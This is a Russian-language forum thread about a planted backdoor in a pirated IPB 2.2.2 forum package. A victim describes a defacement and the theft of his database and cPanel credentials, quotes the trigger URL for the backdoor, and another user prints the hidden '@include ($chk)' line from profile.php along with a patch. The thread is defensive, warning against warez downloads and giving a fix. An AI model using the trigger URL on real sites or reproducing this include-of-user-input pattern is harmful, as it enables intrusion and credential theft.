Уязвимость для ipb 2.2.2

[dirak]

В общем история такая. Скачал я и установил нулленный форум ipb 2.2.2 заштопал все дыры как написано на сайте
Для просмотра ссылки Войди или Зарегистрируйся
А потом решил кинуть ссылочку моего форума в один чат. И тут со мной стал переписываться один чел. Он сказал, что мой форум дырявый и сказал посмотреть на главную страницу моего сайта (не форума). Я глянул, а там надпись: Твой сайт дырявый как решето.
Вот думаю я, как он это сделал? Оказывается вот дыра:
index.php?s=&actrofile&CODE=friends_list_popup&ips_check=
И по-моему она у всех нулленных форумах этой версии, вроде даже на лицензионке есть. Ну я этому не придал особого значения, подумал, что исправлю позже. Но вот недавно у форума слетела база данных. И слетела до такой степени, что удалось её восстановить не полностью (стёрлись пользователи, которые регнулись за 5 дней до слёта базы и, сообщения, написанные за 5 дней тоже).
Истиную причину слёта базы незнаю. Админы говорят, что взлома никакого не было. Кстати пострадали ещё 2 форума, тоже ipb 2.2.2 только лицензионные, хостившиеся на этом же серваке. Вот я тому пацану и написал, что база моя мол слетела, что делать? И он мне говорит, что права к базе есть у хостера и у него частично. Я в замешательстве. Он продолжает, мол я её ещё тогда прихватил, типа данные пользователей нужны были. Я так и присел. Ну это ещё цветочки. Потом он мне кидает название моей базы и пароль, потом логин и пароль к сипанели. Вот я ох*ел окончательно. Говорит: Сходится? И всё реально сходится. Но он говорит, что ничего не ломал. А свою страницу на мою главную страницу сайта он закачал шеллом. Но расскрывать секреты не стал, сказал что не сплоитом это сделал.
Вот я думаю, а может все базы ipb полетели из-за меня на серваке? Ведь, мне парень с работы рассказывал как давно через его ipb ломанули тоже все форумы ipb на серваке. Конечно, возможно что на серваке просто произошёл какой-нибудь сбой, но причина так до сих пор и не ясна.
Теперь по поводу уязвимости: Вот нашёл про неё такое на одном из хак форумах: Для просмотра ссылки Войди или Зарегистрируйся
Понял лишь суть, что если набрать в браузере Для просмотра ссылки Войди или Зарегистрируйся и если откроется этот сайт (через...инской сессии..." А я как раз там часто сижу.

 

[-Зверик-]

Никакая это не уязвимость, читай тему внимательно. Это намеренно засунутый бекдор. При чём не нуллеры засунули, а какой-то левый придурок. Дальше этот 'нулл' и закинул на популярные варез сайты, с целью поиметь сайты (засунуть трои, слить остальные сайты на хостинге и т.д.)

Качайте с проверенных источников и групп..

 

[dirak]

Никакая это не уязвимость, читай тему внимательно. Это намеренно засунутый бекдор. При чём не нуллеры засунули, а какой-то левый придурок. Дальше этот 'нулл' и закинул на популярные варез сайты, с целью поиметь сайты (засунуть трои, слить остальные сайты на хостинге и т.д.)
Качайте с проверенных источников и групп..

Ну качал отсюда. Нулл который меня порадовал называется. Отзывы неплохие.
А если я заменю этот index.php на index.php лицензионника, это решит проблему?

 

[tov_Me]

Нет, вряд ли решит. Скорей всего бекдор зашит в другом месте.

 

[dirak]

Нет, вряд ли решит. Скорей всего бекдор зашит в другом месте.

Придётся тогда устнавливать нулл давыдова 2.3.1

 

[lift]

/source/action_public/profile.php
строка 885:

if ( $chk )
{
@include ($chk);
exit();
}

Меняется на

if ( $chk )
{
echo "Чувак, а тут админ не тупее паровоза...";
exit();
}

В принцепе с того-же ачата и взял инфу

 

[chepugrek]

/source/action_public/profile.php
строка 885:
Меняется на
В принцепе с того-же ачата и взял инфу

про паровоз порадовало гг

 

[exystens]

а в давыдове 2.2.2 присутствует эта дыра ?

 

[XUC]

такой же вопрос
в нулле в давыдове , что в первом посте
этот баг присутсвует??
просто хочу сделать форум
выбор между сборкой IPB 2.0 и нулем Давыдова

просьба ответить

заранее благодарю

PS недавно у меня ломанули лиценз форум, который был пропатчен,все права на папки и файлы были выставленны правильно.